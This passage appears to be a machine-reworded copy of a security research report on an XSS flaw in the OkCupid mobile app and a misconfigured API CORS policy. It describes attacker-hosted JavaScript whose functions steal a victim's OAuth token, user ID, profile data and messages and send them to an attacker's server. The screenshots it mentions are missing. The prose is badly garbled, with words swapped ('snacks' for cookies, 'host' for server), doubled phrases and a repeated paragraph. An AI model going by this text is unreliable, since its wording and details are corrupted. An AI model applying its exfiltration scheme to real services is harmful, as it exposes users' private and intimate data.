Sensitive Data visibility & Performing actions with respect to the target

Sensitive Data visibility & Performing actions with respect to the target

As much as this aspect, we’re able to launch the OkCupid application that is mobile a deep website website website link, containing a harmful JavaScript rule when you look at the part parameter. The screenshot that is following the last XSS payload which loads jQuery and then loads JavaScript rule from the attacker’s host: (take note the top of part provides the XSS payload as well as the base section is similar payload encoded with URL encoding):

The screenshot that is following an HTTP GET demand containing the ultimate XSS payload (section parameter):

The host replicates the payload sent previous into the area parameter together with injected JavaScript code is performed within the context of this WebView.

A script file from the attacker’s server as mentioned before, the final XSS payload loads. The loaded JavaScript code will be utilized for exfiltration and account contains 3 functions:

  1. steal_token – Steals users’ verification token, oauthAccessToken, while the users’ id, userid. Users’ sensitive information (PII), such as for example email, is exfiltrated as well.
  2. steal_data – Steals users’ profile and data that are private choices, users’ characteristics ( ag e.g. responses filled during registration), and much more.
  3. Send_data_to_attacker – send the data collected in functions 1 and 2 to your attacker’s host.

steal_token function:

The big event produces A api call to the host. Users cookies that are delivered to the host because the XSS payload is performed into the context of this application’s WebView.

The host reacts having A json that is vast the users’ id and also the verification token too:

Steal information function:

The big event produces an HTTP request endpoint.

On the basis of the data exfiltrated within the function that is steal_token the demand has been delivered because of the authentication token plus the user’s id.

The host reacts with all the current information about the victim’s profile, including e-mail, intimate orientation, height, family members status, etc.

Forward information to attacker function:

The big event produces a POST request towards the attacker’s host containing all the details retrieved in the past function telephone calls (steal_token and steal_data functions).

The screenshot that is following an HTTP POST demand provided for the attacker’s host. The demand body contains all the victim’s information that is sensitive

Performing actions with respect to the target can be feasible because of the exfiltration for the victim’s verification token plus the users’ id. These details can be used when you look at the malicious JavaScript rule (just like used in the steal_data function).

An attacker can perform actions such as forward messages and alter profile data as a result of the information exfiltrated into the function that is steal_token

  1. Authentication token, oauthAccessToken, is employed within the authorization header (bearer value).
  2. Consumer id, userId, is added as needed.

Note: An attacker cannot perform complete account takeover because the snacks are protected with HTTPOnly.

the details exfiltrated within the function that is steal_token

  1. Authentication token, oauthAccessToken, is employed into the authorization header (bearer value).
  2. Consumer id, userId, is added as required.

Note: An attacker cannot perform account that is full considering that the snacks are protected with HTTPOnly.

Internet System Vulnerabilities Mis-configured Cross-Origin Site Sharing Policy Results In Fragile Information Publicity

for the duration of the investigation, we now have discovered that the CORS policy associated with API host api.OkCupid.com isn’t configured precisely and any beginning can deliver needs to your host and read its’ reactions. The request that is following a demand delivered the API host through the beginning

The host doesn’t precisely validate the foundation and reacts aided by the required information. More over, the host reaction contains Access-Control-Allow-Origin: and Access-Control-Allow-Credentials: real headers:

As of this point on, we discovered that people can deliver needs towards the API host from our domain without getting obstructed because of the CORS policy.

The moment a target is authenticated on OkCupid application and browsing into the attacker’s internet application, an HTTP GET demand is provided for containing the victim’s snacks. The server’s reaction contains a vast json, containing the victim’s verification token plus the victim’s user_id.

We’re able to find much more of good use information in the bootstrap API endpoint – sensitive and painful API endpoints within the API host:

The screenshot that is following painful and sensitive PII data exfiltration from the /profile/ API endpoint, utilising the victim’s user_id plus the access_token:

The after screenshot shows exfiltration associated with victim’s messages through the /1/messages/ API endpoint, utilising the victim’s user_id plus the access_token:

Conclusion

The field of online-dating apps has continued to develop quickly across the years, and matured to where it is at today using the change to a world that is digital particularly in the past 6 months – considering that the outbreak of Coronavirus around the world. The “new normal” habits such as as “social distancing” have actually forced the dating globe to entirely depend on electronic tools for help.

The study delivered right right here shows the potential risks connected with one of many longest-established & most popular apps in its sector. The need that is dire privacy and information safety becomes a lot more essential when a great deal private and intimate information being stored, managed and analyzed within an application. The platform and app is made to carry individuals together, but needless to say where individuals get, crooks follows, interested in simple pickings.